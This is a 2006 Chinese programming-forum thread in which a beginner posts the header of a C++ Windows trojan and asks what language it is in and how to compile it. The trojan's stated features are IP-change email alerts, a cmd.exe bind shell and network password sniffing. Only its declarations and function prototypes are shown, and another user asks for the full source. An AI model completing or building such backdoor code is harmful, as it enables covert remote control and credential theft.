| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1825 人关注过本帖
标题:[求助]这是C,还是C++源代码啊?
只看楼主 加入收藏
seankent
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2006-3-11
收藏
 问题点数:0 回复次数:15 
[求助]这是C,还是C++源代码啊?

IP变换后自动发送Email通知
实现了以下功能:
1.IP变换后自动发送Email通知
2.nt/window2000下绑定cmd,98下绑定command
3.sniffer整个无交换网络的telnet pop3密码功能

// troja3.cpp : Defines the entry point for the application.
//written by misher 小鱼巫师
#define zeng
#include "stdafx.h"
#include "Afxwin.h"
#include <stdlib.h>
#include <stdio.h>
#include <conio.h>
#include <afx.h> //CString
#include <winsock2.h>
#include <process.h>
#include <Shellapi.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"MSVCRT.LIB")

#define nBufLen 10000
#define port 4000
//SnifferMain function need variant and struct
#define STATUS_FAILED 0xFFFF //定义异常出错代码
#define MAX_PACK_LEN 65535 //接收的最大IP报文
#define MAX_ADDR_LEN 16 //点分十进制地址的最大长度
#define MAX_HOSTNAME_LAN 255 //最大主机名长度
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
typedef struct _iphdr
{
unsigned char h_lenver; //4位首部长度+4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;

SOCKET SockRaw;
int nNeedPacket=0;
void DecodeIpPack(char *,int);
FILE *NetLog; //数据包记录
//end SnifferMain function need variant and struct
void TelnetForCmd(); //绑定cmd.exe
BOOL reg(char *szExecFile); //创建注册表内容
DWORD WINAPI SnifferMain(void*);
//发送email的一些函数---------------------------------------------------------
DWORD WINAPI SendMail(void*); //把信息发回来的线程
//这义变量和需要用到的函数
CString csError[7]; //错误代码解说
SOCKET pSocket;
CString csSmtp; //SMTP服务器
CString csMailFrom; //发件人
CString csMailTo=""; //收件人
CString csMailHeader; //邮件主题
CString csMailBody;
int MySetSmtp(CString str); //SMTP
int MySetMailFrom(CString str); //发件人
int MySetMailTo(CString str); //收件人
int MySetHeader(CString str); //主题
int MySetBody(CString str); //内容
int MyMailSend();
int TestMail(int nResult);
int MailCreate();
int MailFrom();
int MailTo();
int MailHeader();
int MailQuit();



搜索更多相关主题的帖子: 源代码 
2006-03-11 09:15
wanglff
Rank: 2
等 级:新手上路
威 望:5
帖 子:375
专家分:0
注 册:2005-12-21
收藏
得分:0 

c源代码
#include "stdafx.h"
#include "Afxwin.h"
#include <stdlib.h>
#include <stdio.h>//在c++中#include <cstdio.h>
#include <conio.h>
#include <afx.h> //CString
#include <winsock2.h>
#include <process.h>
#include <Shellapi.h>
看这些就知道了

自强不息:)
2006-03-11 09:38
seankent
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2006-3-11
收藏
得分:0 
谢谢,我没有接触过C++
请问,怎样可以转换这些代码为可执行文件?
2006-03-11 09:44
wanglff
Rank: 2
等 级:新手上路
威 望:5
帖 子:375
专家分:0
注 册:2005-12-21
收藏
得分:0 
通过编译器编译后才可能成为可执行文件

你不会连程序怎么在计算机运行的都不知道

[此贴子已经被作者于2006-3-11 10:01:31编辑过]


自强不息:)
2006-03-11 09:59
seankent
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2006-3-11
收藏
得分:0 

用VC++行吗?

2006-03-11 10:07
Knocker
Rank: 8Rank: 8
等 级:贵宾
威 望:47
帖 子:10454
专家分:603
注 册:2004-6-1
收藏
得分:0 
假如可以,这份源码楼主能否给我一份?
knocker.k@gmail.com

谢谢!

九洲方除百尺冰,映秀又遭蛮牛耕。汽笛嘶鸣国旗半,哀伤尽处是重生。     -老K
治国就是治吏。礼义廉耻,国之四维。四维不张,国之不国。   -毛泽东
2006-03-11 10:55
seankent
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2006-3-11
收藏
得分:0 
OhIytx3c.txt (18.29 KB) [求助]这是C,还是C++源代码啊?


源码有
2006-03-11 11:01
GISboy
Rank: 1
等 级:新手上路
帖 子:26
专家分:0
注 册:2006-2-28
收藏
得分:0 

是C++源代码


2006-03-11 11:31
shenjun
Rank: 1
等 级:新手上路
帖 子:4
专家分:0
注 册:2006-2-20
收藏
得分:0 
哈达

无本之木

2006-03-11 12:08
Knocker
Rank: 8Rank: 8
等 级:贵宾
威 望:47
帖 子:10454
专家分:603
注 册:2004-6-1
收藏
得分:0 
谢了,我看看

九洲方除百尺冰,映秀又遭蛮牛耕。汽笛嘶鸣国旗半,哀伤尽处是重生。     -老K
治国就是治吏。礼义廉耻,国之四维。四维不张,国之不国。   -毛泽东
2006-03-11 12:52
快速回复:[求助]这是C,还是C++源代码啊?
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.016309 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved